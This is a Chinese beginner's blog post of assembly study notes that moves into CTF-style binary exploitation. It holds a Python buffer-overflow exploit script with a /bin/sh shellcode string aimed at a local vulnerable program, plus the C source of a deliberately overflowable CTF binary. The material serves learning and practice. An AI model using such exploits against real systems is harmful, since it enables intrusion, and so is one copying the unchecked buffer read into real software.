补充一些汇编的知识

最新推荐文章于 2022-10-01 10:14:00 发布
最新推荐文章于 2022-10-01 10:14:00 发布
阅读量225 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41645130/article/details/101474525
版权

关于指令和数据

指令和数据都是应用上的概念, 在内存和磁盘中,指令和数据没有任何区别


10651191-64806bf2299d276a.png

一个CPU有N根地址线, 可以说这个CPU的地址总线宽度为N

数据总线 16根数据总线一次传输两个字节

10651191-6690e9631257bccc.png

在内存单元中是按照小端法来存储

但是在寄存器中, 比如AX寄存器存放了4E20, 那么AH存放了4E, AL存放了20

开始探索我的汇编之路

参考了这篇文章
Nasm编译器简单使用

global _start

section .data
        hello : db `hello, world!\n`

section .text
        _start:
                mov     rax, 1          ; system call number should be stored in rax
                mov     rdi, 1          ; argument #1 in rdi: where to write (descriptor)?
                mov     rsi, hello      ; argument #2 in rsi: where does the string start?
                mov     rdx, 14         ; argument #3 in rdx: how many bytes to write?
                syscall                 ; this instruction invokes a system call


                mov     rax, 60         ; 'exit' syscall number
                xor     rdi, rdi        ;
                syscall

从汇编代码到生成一个可执行文件的过程一般需要执行以下几条命令

10651191-f616ad5803463d27.png 
nasm -g -f elf64 -o hello.o hello.s
 ld -o hello hello.o
./hello

参考

https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/
PWN入门

反汇编如下

10651191-a96b8c3e2598b14a.png

栈溢出了

10651191-5e52d755b9d35c30.png

然后这个算是成功了吗?


10651191-819322091c096221.png 
import struct
from subprocess import call

ret_addr = 0x4141413d

scode = "\x31\xc0\x50\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53"

def conv(num):
        return struct.pack("<I", num);

buf = "A"*268
buf += conv(ret_addr)
buf += "\x90"*32
buf += scode

print "calling vulnerable program"
call(["./vul1", buf])

但是我不懂这些exp代表了什么。。

补充一个gdb修改格式的命令


10651191-522c2afef4829538.png

show disassembly-flavor
set disassembly-flavor intel | att

10651191-7af6d96c6f9be7e9.png

IDA分析如下, 应该是一道很友好的签到题目, 然而我太菜了。。

10651191-1d53aec9a13f9a35.png

来看一下相关的指令

lea 取地址
cmp 比较
jnz 跳转

其实应该就是一个缓冲区溢出的问题

翻了一下王爽的汇编,
看到了这样一个题目(图图无关系列)

10651191-5a1c995d43063c61.png

我现在才明白原来offsset的作用就是取得偏移地址
所以上面那段代码的含义其实就很明显了, si里面存放了s段的偏移地址, di里面存放了s0的偏移地址

之后我们需要将s段的代码复制到s0段
要复制的数据有多长呢, mov ax, bx机器码指令的长度为两个字节, 也就是一个字

10651191-c0d13eb89af8903e.png

advanced-leak-x86开始

进入IDA之后是这样子的

10651191-4763dce3d7d3e7ea.png

并没有获得什么特别有用的信息

分析一下寄存器

ecx = [esp+4]
esp 与FFFFFFF0 相与, 这个有点奇怪

这个是welcome函数

10651191-9f2a20749fe01004.png

vuln函数

10651191-442a0014278a53a3.png

忘了贴一张程序的运行结果

10651191-8be236a592f4c254.png

直接上源码吧

#include <stdio.h>
#include <unistd.h>
#include <string.h>

void init(){
    setvbuf(stdout, NULL, _IOLBF, 0);
}

void welcome(){
    char *words = "Welcome to Sniperoj!\nDancing in shackles, Right?";
    puts(words);
}

void vuln(){
    char buffer[16] = {0};
    read(0, buffer, 0x80);
}

int main(){
    init();
    welcome();
    vuln();
    return 0;
}

pwntools使用

pwntools 的常用模块

  • ==asm==:汇编与反汇编
  • ==dynelf==:用于远程符号泄露,需要提供leak方法
  • ==elf==:对elf文件进行操作
  • ==gdb==:配合gdb进行调试
  • ==memleak==:用于内存泄漏
  • ==shellcraft==: shellcode的生成器
  • ==tubes==:包括tubes: 包括tubes.sock, tubes.process, tubes.ssh, tubes.serialtube,分别适用于不同场景的PIPE
  • ==utils==:一些实用的小功能,例如CRC计算,cyclic pattern等

remote远程连接主机, 或者 process()运行一个程序

sendline()和readline()可以与之交互一下

p32 了解一下?

对于整数的pack与数据的unpack,可以使用p32,p64,u32,u64这些函数,分别对应着32位和64位的整数。

read(address, count) : 在address(VMA)位置读取count个字节
write(address, data) : 在address(VMA)位置写入data

10651191-fc541443eda1f5f9.png
image.png

参考

64位Linux系统跑32位程序
在64位的Linux上执行32位程序

萍水间人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
汇编指令表
CHAOS_ORDER的博客
11-24 1917
指令 功能 AAA 调整加 AAD 调整除 AAM 调整乘 AAS 调整减 ADC 进位加 ADD 加 AND 与 ARPL 调整优先级 BOUND 检查数组 BSF 位右扫描 BSR 位左扫描 BSWAP 交换字节 BT 位测试 BTC 位测试求反 BTR 位测试清零 BTS 位测试置一 CALL 过程调用 CBW 转换字节 CDQ 转换双字 CLC 进位清零 CLD 方向清零 CLI 中断清零...
(转)Linux 中的汇编语言
热门推荐
hairetz的专栏
12-23 1万+
Linux 中的汇编语言  在阅读 Linux 源代码时,你可能碰到一些汇编语言片段,有些汇编语言出现在以.S 为扩展名的汇编文件中,在这种文件中,整个程序全部由汇编语言组成。有些汇编命令出 现在以.c 为扩展名的 C 文件中,在这种文件中,既有 C 语言,也有汇编语言,我们把出 现在 C 代码中的汇编语言叫所“嵌入式”汇编。不管这些汇编代码出现在哪里,它在一定 程度上都成为阅读源代码的
ARM 汇编入门实践
ppqppl的博客
10-01 163
ARM 入门实践 —— ARM 汇编 搭建 keil 开发环境 添加芯片 pack 包 keil 安装后打开界面如下: 点击 Pack Installer,打开界面如下: 我们使用的是 STM32F103C8T6,选择 STM32F103C8 : 由于网站在国外,所以下载较慢,请耐心等待 下载好的 pack 包如下: 可以在这里找到我们所需要的芯片的 pack 包,和一些需要的 CM...
64位汇编语言简介
LGYRMetal的专栏
07-03 6709
现在已经是64位的时代了,x86-64(AMD64)平台将是下一代计算机的体系结构,我们开发操作系统的当然要对x86-64的汇编有所了解。 1.x86-64的寄存器 x86-64较x86-32多了8个通用寄存器,而且,每个通用寄存器都是64位宽,它们是: rax,rbx,rcx,rdx,rsi,rdi,rsp,rbp r8,r9,r10,r11,r12,r13,r14,r15 同
arm汇编解析—qnnpack卷积实现
独行侠
09-19 2494
目录 前言 基础直通车 arm基础知识 arm指令释义 qnn汇编代码解析 前言 最近在移植QNNPACK神经网络加速库,涉及到对卷积arm汇编的修改,这边做个记录,对汇编部分的内容进行注释,顺便学习一下汇编的语法。 基础直通车 首先要补充arm汇编基础知识,特别是如何传参一定要搞清楚,另外对arm寄存器要了然于胸,剩下的就是指令的用法了: 利用堆栈入参参考:https:...
汇编语言知识点汇总
技术宇宙
11-29 5779
目录前言第1章 基础知识1.6 存储单元1.8 地址总线1.9 数据总线第2章 寄存器2.7 “段地址×16+偏移地址=物理地址”的本质含义第3章 寄存器(内存访问)3.1内存中字的存储3.2 DS和[address] 前言 参考教材:王爽编著的《汇编语言》(第3版) 第1章 基础知识 1.6 存储单元 一个存储单元存储 1字节(Byte/B) = 8比特/位(bit)。 转换前 转换后 1KB 210B 1MB 220B 1GB 230B 1TB 240B 1KB的存储器
汇编语言基础知识
weixin_45111030的博客
01-14 493
汇编语言:是人和计算机沟通最直接的方式。 学习汇编语言的目的: 充分获得底层编程的体验。 深刻理解机器运行程序的机理。 优点:效率,底层。 计算机主板的组成结构:
汇编语言知识总结
weixin_45795497的博客
12-23 2068
----------------------汇编语言------------------------ 1 byte = 8 bit 1个字节=8位二进制 1 KB = 1024 byte = 2的10次方byte 1 MB = 1024 KB = 2的20次方byte 1GB = 1024 MB = 2的30次方byte CPU中一定有可以存放地址信息和数据信息的地方——寄存器 我们汇编程序员就是通过汇编语言中的汇编指令去修改寄存器中的内容从而控制CPU,就可以控制整个计算机了 寄存器是相互
汇编补充知识
10-08
学习汇编的朋友可以看看,主要是一些补充知识
C语言内嵌汇编编程
11-02
CSAPP书中补充知识:C语言内嵌汇编编程.文档简单介绍了内嵌汇编的规则,并且给出几个练习并附有参考答案.内容简洁,非常适合快速学习
80x86 汇编语言程序设计 第一章 课件( PDF )
02-06
本资料为 80x86 汇编语言程序设计第一章课件,配套教材为王元珍版 80x86 汇编语言程序设计,课件中包含课本知识点、知识点解析、老师补充内容、重点例题习题及答案。全套课件共包含 6 章内容及复习课课件,是适合于...
零基础入门学习汇编
10-06
当课程迕行到需要补充新癿基础知识(关亍编程结极戒其他癿)旪候,再对相关癿基础知识迕行仃绉和探讨。 本书癿原则是,以后用到癿知识,以后再说。 汇编课程癿研究重点放在如何利用硬件系统癿编程结极和指令集有效...
汇编语言 实验工具箱和预备知识
06-06
汇编语言 实验工具箱和预备知识 Emu8086 Examples masm 实验预备知识(补充材料).doc
“推荐系统”相关资源推荐
06-14
推荐了国内外对推荐系统的讲解相关资源
全渠道电商平台业务中台解决方案.pptx
06-14
全渠道电商平台业务中台解决方案.pptx
云计算企业私有云平台建设方案.pptx
06-14
云计算企业私有云平台建设方案.pptx
通过CNN卷积神经网络对盆栽识别-含图片数据集.zip
最新发布
06-14
本代码是基于python pytorch环境安装的。 下载本代码后,有个requirement.txt文本,里面介绍了如何安装环境,环境需要自行配置。 或可直接参考下面博文进行环境安装。 https://blog.csdn.net/no_work/article/details/139246467 如果实在不会安装的,可以直接下载免安装环境包,有偿的哦 https://download.csdn.net/download/qq_34904125/89365780 安装好环境之后, 代码需要依次运行 01数据集文本生成制作.py 02深度学习模型训练.py 和03pyqt_ui界面.py 数据集文件夹存放了本次识别的各个类别图片。 本代码对数据集进行了预处理,包括通过在较短边增加灰边,使得图片变为正方形(如果图片原本就是正方形则不会增加灰边),和旋转角度,来扩增增强数据集, 运行01数据集文本制作.py文件,会就读取数据集下每个类别文件中的图片路径和对应的标签 运行02深度学习模型训练.py就会将txt文本中记录的训练集和验证集进行读取训练,训练好后会保存模型在本地
0.96寸OLED显示屏
06-14
尺寸与分辨率:该显示屏的尺寸为0.96英寸,常见分辨率为128x64像素,意味着横向有128个像素点,纵向有64个像素点。这种分辨率足以显示基本信息和简单的图形。 显示技术:OLED(有机发光二极管)技术使得每个像素都能自发光,不需要背光源,因此对比度高、色彩鲜艳、视角宽广,且在低亮度环境下表现更佳,同时能实现更低的功耗。 接口类型:这种显示屏通常支持I²C(IIC)和SPI两种通信接口,有些型号可能还支持8080或6800并行接口。I²C接口因其简单且仅需两根数据线(SCL和SDA)而广受欢迎,适用于降低硬件复杂度和节省引脚资源。 驱动IC:常见的驱动芯片为SSD1306,它负责控制显示屏的图像显示,支持不同显示模式和刷新频率的设置。 物理接口:根据型号不同,可能有4针(I²C接口)或7针(SPI接口)的物理连接器。 颜色选项:虽然大多数0.96寸OLED屏为单色(通常是白色或蓝色),但也有双色版本,如黄蓝双色,其中屏幕的一部分显示黄色,另一部分显示蓝色。
汇编语言基础知识整理
03-14
下面是汇编语言的基础知识整理: 1. 汇编语言的作用:汇编语言用于编写底层程序,如操作系统、驱动程序和嵌入式系统等。 2. 汇编语言的特点:汇编语言是一种符号化的机器语言,使用助记符来代替二进制指令,使程序...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值